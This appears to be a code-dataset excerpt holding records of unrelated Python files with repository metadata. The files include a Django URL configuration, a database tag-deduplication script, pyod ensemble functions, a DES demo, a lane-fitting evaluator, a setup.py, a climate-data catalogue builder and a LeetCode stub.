frontend_schema_view = get_swagger_view(
title='Frontend API',
url="/webapi",
urlconf=webapi_urls,
description="MantisTable Frontend API"
)
urlpatterns = [
path('', RedirectView.as_view(url='dashboard', permanent=False), name='index'),
path('dashboard/', include('dashboard.urls')),
path('webapi/', include('web_api.urls')),
path('webapi/', frontend_schema_view),
path('api/', include('api.urls')),
path('api/', mantis_schema_view),
path('admin/', admin.site.urls)
]
| 30.907895 | 172 | 0.680289 | from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import RedirectView
from rest_framework_swagger import renderers
from rest_framework import exceptions
from rest_framework.permissions import AllowAny
from rest_framework.renderers import CoreJSONRenderer
from rest_framework.response import Response
from rest_framework.schemas import SchemaGenerator
from rest_framework.views import APIView
from api import urls as api_urls
from web_api import urls as webapi_urls
def get_swagger_view(title=None, url=None, patterns=None, urlconf=None, description=None):
"""
Returns schema view which renders Swagger/OpenAPI.
"""
class SwaggerSchemaView(APIView):
_ignore_model_permissions = True
exclude_from_schema = True
permission_classes = [AllowAny]
renderer_classes = [
CoreJSONRenderer,
renderers.OpenAPIRenderer,
renderers.SwaggerUIRenderer
]
def get(self, request):
generator = SchemaGenerator(
title=title,
url=url,
description=description,
patterns=patterns,
urlconf=urlconf
)
schema = generator.get_schema(request=request)
if not schema:
raise exceptions.ValidationError(
'The schema generator did not return a schema Document'
)
return Response(schema)
return SwaggerSchemaView.as_view()
mantis_schema_view = get_swagger_view(
title='MantisTable API',
url="/api",
urlconf=api_urls,
description="MantisTable API allows to identify annotations (Entity Linking, Predicate Annotation, Concept Annotation) by using a non-destructive, incremental approach"
)
frontend_schema_view = get_swagger_view(
title='Frontend API',
url="/webapi",
urlconf=webapi_urls,
description="MantisTable Frontend API"
)
urlpatterns = [
path('', RedirectView.as_view(url='dashboard', permanent=False), name='index'),
path('dashboard/', include('dashboard.urls')),
path('webapi/', include('web_api.urls')),
path('webapi/', frontend_schema_view),
path('api/', include('api.urls')),
path('api/', mantis_schema_view),
path('admin/', admin.site.urls)
]
| 487 | 307 | 26 |
2d3a4e48defe14889dec4547a5425bc35ef8360b | 1,618 | py | Python | scripts/delete_duplicate_tags.py | lokal-profil/isfdb_site | 0ce20d6347849926d4eda961ea9249c31519eea5 | [
"BSD-3-Clause"
] | null | null | null | scripts/delete_duplicate_tags.py | lokal-profil/isfdb_site | 0ce20d6347849926d4eda961ea9249c31519eea5 | [
"BSD-3-Clause"
] | null | null | null | scripts/delete_duplicate_tags.py | lokal-profil/isfdb_site | 0ce20d6347849926d4eda961ea9249c31519eea5 | [
"BSD-3-Clause"
] | null | null | null | #!_PYTHONLOC
#
# (C) COPYRIGHT 2014 Ahasuerus
# ALL RIGHTS RESERVED
#
# The copyright notice above does not evidence any actual or
# intended publication of such source code.
#
# Version: $Revision$
# Date: $Date$
import cgi
import sys
import os
import string
import MySQLdb
from localdefs import *
if __name__ == '__main__':
db = MySQLdb.connect(DBASEHOST, USERNAME, PASSWORD, conv=IsfdbConvSetup())
db.select_db(DBASE)
# Find all duplicate tags
query = "select tag_id,title_id,user_id,count(*) as xx from tag_mapping group by tag_id,title_id,user_id having xx > 1"
db.query(query)
result = db.store_result()
tag_count = result.num_rows()
record = result.fetch_row()
tags = []
while record:
tags.append(record[0])
record = result.fetch_row()
row_count = 0
for tag in tags:
tag_id = tag[0]
title_id = tag[1]
user_id = tag[2]
row_count += int(tag[3])
update = "delete from tag_mapping where tag_id=%d and title_id=%d and user_id=%d" % (int(tag_id), int(title_id), int(user_id))
db.query(update)
update = "insert into tag_mapping(tag_id, title_id, user_id) values(%d, %d, %d)" % (int(tag_id), int(title_id), int(user_id))
db.query(update)
print "Total processed: %d rows in %d tags" % (row_count, tag_count)
| 28.892857 | 138 | 0.633498 | #!_PYTHONLOC
#
# (C) COPYRIGHT 2014 Ahasuerus
# ALL RIGHTS RESERVED
#
# The copyright notice above does not evidence any actual or
# intended publication of such source code.
#
# Version: $Revision$
# Date: $Date$
import cgi
import sys
import os
import string
import MySQLdb
from localdefs import *
def Date_or_None(s):
return s
def IsfdbConvSetup():
import MySQLdb.converters
IsfdbConv = MySQLdb.converters.conversions
IsfdbConv[10] = Date_or_None
return(IsfdbConv)
if __name__ == '__main__':
db = MySQLdb.connect(DBASEHOST, USERNAME, PASSWORD, conv=IsfdbConvSetup())
db.select_db(DBASE)
# Find all duplicate tags
query = "select tag_id,title_id,user_id,count(*) as xx from tag_mapping group by tag_id,title_id,user_id having xx > 1"
db.query(query)
result = db.store_result()
tag_count = result.num_rows()
record = result.fetch_row()
tags = []
while record:
tags.append(record[0])
record = result.fetch_row()
row_count = 0
for tag in tags:
tag_id = tag[0]
title_id = tag[1]
user_id = tag[2]
row_count += int(tag[3])
update = "delete from tag_mapping where tag_id=%d and title_id=%d and user_id=%d" % (int(tag_id), int(title_id), int(user_id))
db.query(update)
update = "insert into tag_mapping(tag_id, title_id, user_id) values(%d, %d, %d)" % (int(tag_id), int(title_id), int(user_id))
db.query(update)
print "Total processed: %d rows in %d tags" % (row_count, tag_count)
| 160 | 0 | 46 |
6ad791046708ce8b4b90ae8c899b17e57d7654a3 | 9,745 | py | Python | pyod/models/combination.py | marchezinixd/pyod | 3c2de3237245e682fe0c9c1ae6a987d4d238cced | [
"BSD-2-Clause"
] | 1 | 2021-07-14T08:23:40.000Z | 2021-07-14T08:23:40.000Z | pyod/models/combination.py | vgarcialeandro/pyod | 03ec97cb95f9a20a39807e7e5983d35b0cd46d31 | [
"BSD-2-Clause"
] | null | null | null | pyod/models/combination.py | vgarcialeandro/pyod | 03ec97cb95f9a20a39807e7e5983d35b0cd46d31 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""A collection of model combination functionalities.
"""
# Author: Yue Zhao <zhaoy@cmu.edu>
# License: BSD 2 clause
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.random import RandomState
from sklearn.utils import check_array
from sklearn.utils import column_or_1d
# noinspection PyProtectedMember
from sklearn.utils import shuffle
from sklearn.utils.random import sample_without_replacement
from sklearn.utils.testing import assert_equal
from ..utils.utility import check_parameter
def _aom_moa_helper(mode, scores, n_buckets, method, bootstrap_estimators,
random_state):
"""Internal helper function for Average of Maximum (AOM) and
Maximum of Average (MOA). See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the maximum/average score
as the subgroup score. Finally, take the average/maximum of all subgroup
outlier scores.
Parameters
----------
mode : str
Define the operation model, either "AOM" or "MOA".
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators.
n_buckets : int, optional (default=5)
The number of subgroups to build.
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
if mode != 'AOM' and mode != 'MOA':
raise NotImplementedError(
'{mode} is not implemented'.format(mode=mode))
scores = check_array(scores)
# TODO: add one more parameter for max number of estimators
# use random_state instead
# for now it is fixed at n_estimators/2
n_estimators = scores.shape[1]
check_parameter(n_buckets, 2, n_estimators, param_name='n_buckets')
scores_buckets = np.zeros([scores.shape[0], n_buckets])
if method == 'static':
n_estimators_per_bucket = int(n_estimators / n_buckets)
if n_estimators % n_buckets != 0:
raise ValueError('n_estimators / n_buckets has a remainder. Not '
'allowed in static mode.')
if not bootstrap_estimators:
# shuffle the estimator order
shuffled_list = shuffle(list(range(0, n_estimators, 1)),
random_state=random_state)
head = 0
for i in range(0, n_estimators, n_estimators_per_bucket):
tail = i + n_estimators_per_bucket
batch_ind = int(i / n_estimators_per_bucket)
if mode == 'AOM':
scores_buckets[:, batch_ind] = np.max(
scores[:, shuffled_list[head:tail]], axis=1)
else:
scores_buckets[:, batch_ind] = np.mean(
scores[:, shuffled_list[head:tail]], axis=1)
# increment index
head = head + n_estimators_per_bucket
# noinspection PyUnusedLocal
else:
for i in range(n_buckets):
ind = sample_without_replacement(n_estimators,
n_estimators_per_bucket,
random_state=random_state)
if mode == 'AOM':
scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
else:
scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
elif method == 'dynamic': # random bucket size
for i in range(n_buckets):
# the number of estimators in a bucket should be 2 - n/2
max_estimator_per_bucket = RandomState(seed=random_state).randint(
2, int(n_estimators / 2))
ind = sample_without_replacement(n_estimators,
max_estimator_per_bucket,
random_state=random_state)
if mode == 'AOM':
scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
else:
scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
else:
raise NotImplementedError(
'{method} is not implemented'.format(method=method))
if mode == 'AOM':
return np.mean(scores_buckets, axis=1)
else:
return np.max(scores_buckets, axis=1)
def aom(scores, n_buckets=5, method='static', bootstrap_estimators=False,
random_state=None):
"""Average of Maximum - An ensemble method for combining multiple
estimators. See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the maximum score as the
subgroup score. Finally, take the average of all subgroup outlier scores.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators
n_buckets : int, optional (default=5)
The number of subgroups to build
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
return _aom_moa_helper('AOM', scores, n_buckets, method,
bootstrap_estimators, random_state)
def moa(scores, n_buckets=5, method='static', bootstrap_estimators=False,
random_state=None):
"""Maximization of Average - An ensemble method for combining multiple
estimators. See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the average score as the
subgroup score. Finally, take the maximization of all subgroup outlier
scores.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators
n_buckets : int, optional (default=5)
The number of subgroups to build
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
return _aom_moa_helper('MOA', scores, n_buckets, method,
bootstrap_estimators, random_state)
def average(scores, estimator_weights=None):
"""Combination method to merge the outlier scores from multiple estimators
by taking the average.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
Score matrix from multiple estimators on the same samples.
estimator_weights : list of shape (1, n_estimators)
If specified, using weighted average
Returns
-------
combined_scores : numpy array of shape (n_samples, )
The combined outlier scores.
"""
scores = check_array(scores)
if estimator_weights is not None:
if estimator_weights.shape != (1, scores.shape[1]):
raise ValueError(
'Bad input shape of estimator_weight: (1, {score_shape}),'
'and {estimator_weights} received'.format(
score_shape=scores.shape[1],
estimator_weights=estimator_weights.shape))
# (d1*w1 + d2*w2 + ...+ dn*wn)/(w1+w2+...+wn)
# generated weighted scores
scores = np.sum(np.multiply(scores, estimator_weights),
axis=1) / np.sum(estimator_weights)
return scores.ravel()
else:
return np.mean(scores, axis=1).ravel()
def maximization(scores):
"""Combination method to merge the outlier scores from multiple estimators
by taking the maximum.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
Score matrix from multiple estimators on the same samples.
Returns
-------
combined_scores : numpy array of shape (n_samples, )
The combined outlier scores.
"""
scores = check_array(scores)
return np.max(scores, axis=1).ravel()
| 36.36194 | 78 | 0.636018 | # -*- coding: utf-8 -*-
"""A collection of model combination functionalities.
"""
# Author: Yue Zhao <zhaoy@cmu.edu>
# License: BSD 2 clause
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.random import RandomState
from sklearn.utils import check_array
from sklearn.utils import column_or_1d
# noinspection PyProtectedMember
from sklearn.utils import shuffle
from sklearn.utils.random import sample_without_replacement
from sklearn.utils.testing import assert_equal
from ..utils.utility import check_parameter
def _aom_moa_helper(mode, scores, n_buckets, method, bootstrap_estimators,
random_state):
"""Internal helper function for Average of Maximum (AOM) and
Maximum of Average (MOA). See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the maximum/average score
as the subgroup score. Finally, take the average/maximum of all subgroup
outlier scores.
Parameters
----------
mode : str
Define the operation model, either "AOM" or "MOA".
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators.
n_buckets : int, optional (default=5)
The number of subgroups to build.
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
if mode != 'AOM' and mode != 'MOA':
raise NotImplementedError(
'{mode} is not implemented'.format(mode=mode))
scores = check_array(scores)
# TODO: add one more parameter for max number of estimators
# use random_state instead
# for now it is fixed at n_estimators/2
n_estimators = scores.shape[1]
check_parameter(n_buckets, 2, n_estimators, param_name='n_buckets')
scores_buckets = np.zeros([scores.shape[0], n_buckets])
if method == 'static':
n_estimators_per_bucket = int(n_estimators / n_buckets)
if n_estimators % n_buckets != 0:
raise ValueError('n_estimators / n_buckets has a remainder. Not '
'allowed in static mode.')
if not bootstrap_estimators:
# shuffle the estimator order
shuffled_list = shuffle(list(range(0, n_estimators, 1)),
random_state=random_state)
head = 0
for i in range(0, n_estimators, n_estimators_per_bucket):
tail = i + n_estimators_per_bucket
batch_ind = int(i / n_estimators_per_bucket)
if mode == 'AOM':
scores_buckets[:, batch_ind] = np.max(
scores[:, shuffled_list[head:tail]], axis=1)
else:
scores_buckets[:, batch_ind] = np.mean(
scores[:, shuffled_list[head:tail]], axis=1)
# increment index
head = head + n_estimators_per_bucket
# noinspection PyUnusedLocal
else:
for i in range(n_buckets):
ind = sample_without_replacement(n_estimators,
n_estimators_per_bucket,
random_state=random_state)
if mode == 'AOM':
scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
else:
scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
elif method == 'dynamic': # random bucket size
for i in range(n_buckets):
# the number of estimators in a bucket should be 2 - n/2
max_estimator_per_bucket = RandomState(seed=random_state).randint(
2, int(n_estimators / 2))
ind = sample_without_replacement(n_estimators,
max_estimator_per_bucket,
random_state=random_state)
if mode == 'AOM':
scores_buckets[:, i] = np.max(scores[:, ind], axis=1)
else:
scores_buckets[:, i] = np.mean(scores[:, ind], axis=1)
else:
raise NotImplementedError(
'{method} is not implemented'.format(method=method))
if mode == 'AOM':
return np.mean(scores_buckets, axis=1)
else:
return np.max(scores_buckets, axis=1)
def aom(scores, n_buckets=5, method='static', bootstrap_estimators=False,
random_state=None):
"""Average of Maximum - An ensemble method for combining multiple
estimators. See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the maximum score as the
subgroup score. Finally, take the average of all subgroup outlier scores.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators
n_buckets : int, optional (default=5)
The number of subgroups to build
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
return _aom_moa_helper('AOM', scores, n_buckets, method,
bootstrap_estimators, random_state)
def moa(scores, n_buckets=5, method='static', bootstrap_estimators=False,
random_state=None):
"""Maximization of Average - An ensemble method for combining multiple
estimators. See :cite:`aggarwal2015theoretical` for details.
First dividing estimators into subgroups, take the average score as the
subgroup score. Finally, take the maximization of all subgroup outlier
scores.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
The score matrix outputted from various estimators
n_buckets : int, optional (default=5)
The number of subgroups to build
method : str, optional (default='static')
{'static', 'dynamic'}, if 'dynamic', build subgroups
randomly with dynamic bucket size.
bootstrap_estimators : bool, optional (default=False)
Whether estimators are drawn with replacement.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the
random number generator; If RandomState instance, random_state is
the random number generator; If None, the random number generator
is the RandomState instance used by `np.random`.
Returns
-------
combined_scores : Numpy array of shape (n_samples,)
The combined outlier scores.
"""
return _aom_moa_helper('MOA', scores, n_buckets, method,
bootstrap_estimators, random_state)
def average(scores, estimator_weights=None):
"""Combination method to merge the outlier scores from multiple estimators
by taking the average.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
Score matrix from multiple estimators on the same samples.
estimator_weights : list of shape (1, n_estimators)
If specified, using weighted average
Returns
-------
combined_scores : numpy array of shape (n_samples, )
The combined outlier scores.
"""
scores = check_array(scores)
if estimator_weights is not None:
if estimator_weights.shape != (1, scores.shape[1]):
raise ValueError(
'Bad input shape of estimator_weight: (1, {score_shape}),'
'and {estimator_weights} received'.format(
score_shape=scores.shape[1],
estimator_weights=estimator_weights.shape))
# (d1*w1 + d2*w2 + ...+ dn*wn)/(w1+w2+...+wn)
# generated weighted scores
scores = np.sum(np.multiply(scores, estimator_weights),
axis=1) / np.sum(estimator_weights)
return scores.ravel()
else:
return np.mean(scores, axis=1).ravel()
def maximization(scores):
"""Combination method to merge the outlier scores from multiple estimators
by taking the maximum.
Parameters
----------
scores : numpy array of shape (n_samples, n_estimators)
Score matrix from multiple estimators on the same samples.
Returns
-------
combined_scores : numpy array of shape (n_samples, )
The combined outlier scores.
"""
scores = check_array(scores)
return np.max(scores, axis=1).ravel()
| 0 | 0 | 0 |
6799b6115ad4101e894be13612541c18fac3a3c0 | 228 | py | Python | driver.py | anishLearnsToCode/DES | 193e0b59d355b1f5a030e362d704db1199643367 | [
"MIT"
] | 3 | 2020-08-27T11:01:54.000Z | 2021-08-05T16:47:43.000Z | driver.py | anishLearnsToCode/DES | 193e0b59d355b1f5a030e362d704db1199643367 | [
"MIT"
] | null | null | null | driver.py | anishLearnsToCode/DES | 193e0b59d355b1f5a030e362d704db1199643367 | [
"MIT"
] | 1 | 2020-11-01T00:43:13.000Z | 2020-11-01T00:43:13.000Z | from des import DES
des = DES(key=193)
number = 123456
ciphertext = des.encrypt_number(number)
decrypted = des.decrypt_number(ciphertext)
print('Number:', number)
print('Encrypted:', ciphertext)
print('Decrypyed', decrypted)
| 19 | 42 | 0.758772 | from des import DES
des = DES(key=193)
number = 123456
ciphertext = des.encrypt_number(number)
decrypted = des.decrypt_number(ciphertext)
print('Number:', number)
print('Encrypted:', ciphertext)
print('Decrypyed', decrypted)
| 0 | 0 | 0 |
78af9b37381badff33d7d5ddb89277c199570422 | 1,505 | py | Python | utils/upperbound.py | atharva-diwan/PolyLaneNet | ec58d1d5207e78233e25dd501a58ce535a82cd1e | [
"MIT"
] | 540 | 2020-11-10T11:09:00.000Z | 2022-03-30T01:49:33.000Z | utils/upperbound.py | chisyliu/PolyLaneNet | c89500428ddd72e7c3027955d88fd074603f48e0 | [
"MIT"
] | 83 | 2020-11-14T17:43:34.000Z | 2022-03-22T08:49:23.000Z | utils/upperbound.py | chisyliu/PolyLaneNet | c89500428ddd72e7c3027955d88fd074603f48e0 | [
"MIT"
] | 122 | 2020-11-12T01:29:12.000Z | 2022-03-23T09:50:50.000Z | import sys
import warnings
import numpy as np
from progressbar import progressbar
from lib.config import Config
from utils.evaluator import Evaluator
warnings.simplefilter('ignore', np.RankWarning)
if __name__ == "__main__":
cfg = Config(sys.argv[1] if len(sys.argv) > 1 else 'config.yaml')
dataset = cfg.get_dataset('test')
for n in range(1, 5 + 1):
result = polyfit_upperbound(dataset, n)
print('Degree {} upperbound:'.format(n))
for metric in result:
if metric['name'] == 'Accuracy':
print('\t{}: {:.2f}'.format(metric['name'], metric['value'] * 100))
else:
print('\t{}: {:.3f}'.format(metric['name'], metric['value']))
| 33.444444 | 83 | 0.572093 | import sys
import warnings
import numpy as np
from progressbar import progressbar
from lib.config import Config
from utils.evaluator import Evaluator
warnings.simplefilter('ignore', np.RankWarning)
def polyfit_upperbound(dataset, degree):
evaluator = Evaluator(dataset, '/tmp', degree)
print('Predicting with upperbound...')
for i, anno in enumerate(progressbar(dataset.annotations)):
label = anno['label']
pred = np.zeros((label.shape[0], 1 + 2 + degree + 1))
pred[:, :3] = label[:, :3]
for j, lane in enumerate(label):
if lane[0] == 0:
continue
xy = lane[3:]
x = xy[:(len(xy) // 2)]
y = xy[(len(xy) // 2):]
ind = x > 0
pred[j, -(degree + 1):] = np.polyfit(y[ind], x[ind], degree)
evaluator.add_prediction([i], pred, 0.0005) # 0.0005 = dummy runtime
_, result = evaluator.eval(label='upperbound', only_metrics=True)
return result
if __name__ == "__main__":
cfg = Config(sys.argv[1] if len(sys.argv) > 1 else 'config.yaml')
dataset = cfg.get_dataset('test')
for n in range(1, 5 + 1):
result = polyfit_upperbound(dataset, n)
print('Degree {} upperbound:'.format(n))
for metric in result:
if metric['name'] == 'Accuracy':
print('\t{}: {:.2f}'.format(metric['name'], metric['value'] * 100))
else:
print('\t{}: {:.3f}'.format(metric['name'], metric['value']))
| 761 | 0 | 23 |
e0f582ab986d59429d0dd26f613fbcdd89e6425c | 95 | py | Python | faster_rcnn/symbols/__init__.py | fourmi1995/IronExperiment-DCN | 5292539764588e0168016c7e7b4df038358e9f38 | [
"MIT"
] | 2 | 2020-11-10T07:37:09.000Z | 2021-02-09T06:26:25.000Z | faster_rcnn/symbols/__init__.py | fourmi1995/IronExperiment-DCN | 5292539764588e0168016c7e7b4df038358e9f38 | [
"MIT"
] | null | null | null | faster_rcnn/symbols/__init__.py | fourmi1995/IronExperiment-DCN | 5292539764588e0168016c7e7b4df038358e9f38 | [
"MIT"
] | 1 | 2019-08-07T02:35:16.000Z | 2019-08-07T02:35:16.000Z | import resnet_v1_101_rcnn
import resnet_v1_101_rcnn_dcn
import resnet_v1_101_rcnn_dcn_dense
| 23.75 | 36 | 0.905263 | import resnet_v1_101_rcnn
import resnet_v1_101_rcnn_dcn
import resnet_v1_101_rcnn_dcn_dense
| 0 | 0 | 0 |
d9f21745b42cce43949cdd8e3409093c49f6d8af | 1,697 | py | Python | setup.py | cedadev/django-jdma_control | 9223aa2f8773e78c6f78197ae89289452d1285c9 | [
"BSD-3-Clause"
] | null | null | null | setup.py | cedadev/django-jdma_control | 9223aa2f8773e78c6f78197ae89289452d1285c9 | [
"BSD-3-Clause"
] | 23 | 2018-03-21T14:36:24.000Z | 2020-04-17T07:58:33.000Z | setup.py | cedadev/django-jdma_control | 9223aa2f8773e78c6f78197ae89289452d1285c9 | [
"BSD-3-Clause"
] | null | null | null | import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='jdma_control',
version='0.2.27',
packages=['jdma_control'],
install_requires=[
'appdirs',
'beautifulsoup4',
'boto3',
'django',
'django-extensions',
'django-multiselectfield',
'django-sizefield',
'html5lib',
'lxml',
'jasmin-ldap',
'packaging',
'psycopg2-binary',
'pycryptodome',
'pyparsing',
'pytz',
'requests'
],
include_package_data=True,
license='my License', # example license
description=('A Django app to migrate directories of files to external'
'storage from groupworkspaces on JASMIN.'),
long_description=README,
url='http://www.ceda.ac.uk/',
author='Neil Massey',
author_email='neil.massey@stfc.ac.uk',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License', # example license
'Operating System :: OS Independent',
'Programming Language :: Python',
# Replace these appropriately if you are stuck on Python 2.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| 30.854545 | 78 | 0.595168 | import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='jdma_control',
version='0.2.27',
packages=['jdma_control'],
install_requires=[
'appdirs',
'beautifulsoup4',
'boto3',
'django',
'django-extensions',
'django-multiselectfield',
'django-sizefield',
'html5lib',
'lxml',
'jasmin-ldap',
'packaging',
'psycopg2-binary',
'pycryptodome',
'pyparsing',
'pytz',
'requests'
],
include_package_data=True,
license='my License', # example license
description=('A Django app to migrate directories of files to external'
'storage from groupworkspaces on JASMIN.'),
long_description=README,
url='http://www.ceda.ac.uk/',
author='Neil Massey',
author_email='neil.massey@stfc.ac.uk',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License', # example license
'Operating System :: OS Independent',
'Programming Language :: Python',
# Replace these appropriately if you are stuck on Python 2.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| 0 | 0 | 0 |
97654bd538b29c3e1298416c0179a5829ea902ae | 1,097 | py | Python | build_ECMWF_cca_scratch_catalogue.py | AJueling/EC-Earth3-data | 26363e059bd7e9117dcf4fcd30f60fae7008573f | [
"Unlicense"
] | null | null | null | build_ECMWF_cca_scratch_catalogue.py | AJueling/EC-Earth3-data | 26363e059bd7e9117dcf4fcd30f60fae7008573f | [
"Unlicense"
] | null | null | null | build_ECMWF_cca_scratch_catalogue.py | AJueling/EC-Earth3-data | 26363e059bd7e9117dcf4fcd30f60fae7008573f | [
"Unlicense"
] | null | null | null | import os
import csv
from tqdm.autonotebook import tqdm
csv_file = open("ecmwf_cca_scratch.csv", "w")
writer = csv.writer(csv_file)
writer.writerow(['mip_era','activity_id','institution_id','source_id','experiment_id','member_id','table_id','variable_id','grid_label','version','dcpp_start_year','time_range','nc_path'])
for store in ['CMIP6', 'PRIMAVERA']: # 46 & 12 secs, respectively
rootDir = f'/scratch/ms/nl/nm6/cmorised-results/EC-EARTH3P-HR-HighResMIP-highres-future/s2hh/CMIP6/HighResMIP/'
print(store)
print(os.listdir(rootDir))
for dirName, subdirList, fileList in tqdm(os.walk(rootDir)):
if not any(fname.endswith('.nc') for fname in fileList): continue
os.path.normpath(dirName).split(os.path.sep)
mip_era = 'CMIP6'
name_list = os.path.normpath(dirName).split(os.path.sep)[-9:]
[activity_id, institution_id, source_id, experiment_id, member_id, table_id, variable_id, grid_label, version] = name_list
nc_path = dirName+'/*.nc'
writer.writerow(['CMIP6']+name_list+2*['']+[dirName+'/*.nc'])
csv_file.close() | 45.708333 | 188 | 0.701003 | import os
import csv
from tqdm.autonotebook import tqdm
csv_file = open("ecmwf_cca_scratch.csv", "w")
writer = csv.writer(csv_file)
writer.writerow(['mip_era','activity_id','institution_id','source_id','experiment_id','member_id','table_id','variable_id','grid_label','version','dcpp_start_year','time_range','nc_path'])
for store in ['CMIP6', 'PRIMAVERA']: # 46 & 12 secs, respectively
rootDir = f'/scratch/ms/nl/nm6/cmorised-results/EC-EARTH3P-HR-HighResMIP-highres-future/s2hh/CMIP6/HighResMIP/'
print(store)
print(os.listdir(rootDir))
for dirName, subdirList, fileList in tqdm(os.walk(rootDir)):
if not any(fname.endswith('.nc') for fname in fileList): continue
os.path.normpath(dirName).split(os.path.sep)
mip_era = 'CMIP6'
name_list = os.path.normpath(dirName).split(os.path.sep)[-9:]
[activity_id, institution_id, source_id, experiment_id, member_id, table_id, variable_id, grid_label, version] = name_list
nc_path = dirName+'/*.nc'
writer.writerow(['CMIP6']+name_list+2*['']+[dirName+'/*.nc'])
csv_file.close() | 0 | 0 | 0 |
c1ac39e50ebf00d5aed5ccd4b062788c2e2b5e48 | 1,838 | py | Python | python/python-algorithm-intervew/14-Tree/review/44-longest-univalue-path-review.py | bum12ark/algorithm | b6e262b0c29a8b5fb551db5a177a40feebc411b4 | [
"MIT"
] | 1 | 2022-03-06T03:49:31.000Z | 2022-03-06T03:49:31.000Z | python/python-algorithm-intervew/14-Tree/review/44-longest-univalue-path-review.py | bum12ark/algorithm | b6e262b0c29a8b5fb551db5a177a40feebc411b4 | [
"MIT"
] | null | null | null | python/python-algorithm-intervew/14-Tree/review/44-longest-univalue-path-review.py | bum12ark/algorithm | b6e262b0c29a8b5fb551db5a177a40feebc411b4 | [
"MIT"
] | null | null | null | """
url: https://leetcode.com/problems/longest-univalue-path/
* 가장 긴 동일 값의 경로
동일한 값을 지닌 가장 긴 경로를 찾아라.
- Example 1
Input :
5
/ \
4 5
/ \ \
1 1 5
Output : 2
Explaination : 루트에서 오른쪽 노드 끝까지 5->5->5로 가장 긴 이동 거리가 2이다.
- Example 2
Input :
1
/ \
4 5
/ \ \
4 4 5
Output : 2
Explaination : 왼쪽 리프 노드 4에서 형제 노드 4까지 4->4->4로 가장 긴 이동 거리가 2이다.
"""
# Definition for a binary tree node.
if __name__ == '__main__':
